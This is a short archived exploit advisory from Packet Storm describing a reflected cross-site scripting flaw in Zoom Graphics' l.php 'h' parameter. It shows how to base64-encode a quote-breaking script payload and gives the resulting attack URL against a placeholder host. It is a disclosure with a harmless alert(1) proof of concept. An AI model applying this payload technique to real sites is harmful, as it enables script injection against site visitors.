Zoom Graphics Cross Site Scripting

2012-11-05T00:00:00
ID PACKETSTORM:117890
Type packetstorm
Reporter Avatar Fearless
Modified 2012-11-05T00:00:00

Description

                                        
                                            `+---------------------------------------------------------------------------------------------------------+  
# Exploit Title : ZOOM GRAPHICS XSS [B64] Vulnerability   
# Date : 2012-08-19  
# Author : Avatar Fearless   
# Official Site : http://zoom.am/  
# Version : x.x.x [UnKnown]  
# Tested on : Windows 7 Ultimate x32   
# Original Advisory : http://thefear.in/zoomam.txt  
# Contact : avatar@hiphopfan.com   
# Web Sites : http://anti-armenia.org/ || http://millikuvvetler.net/ || http://mexfi.org/  
# Greet`Z To : Meta  
+---------------------------------------------------------------------------------------------------------+  
[+] Vulnerable :  
http://site.tld/l.php?l=2&h=[base64 encode]  
  
  
[-] Exploit :  
Firstable You Will take a XSS Code. Example : '><script>alert(1);</script>. We Have to use only quote not Double quote because if we use than script  
will parse double quote. And we will encode this code to Base64 . Output : Jz48c2NyaXB0PmFsZXJ0KDEpOzwvc2NyaXB0Pg== So it will be like this :  
http://site.tld/zoom/l.php?l=2&h=Jz48c2NyaXB0PmFsZXJ0KDEpOzwvc2NyaXB0Pg==  
It is just example  
  
[?] About :  
For More Info Contact me.  
  
[@]  
Respect To :   
All My Bro*S  
AA Team  
MF Team  
MKT Team  
  
+---------------------------------------------------------------------------------------------------------+  
`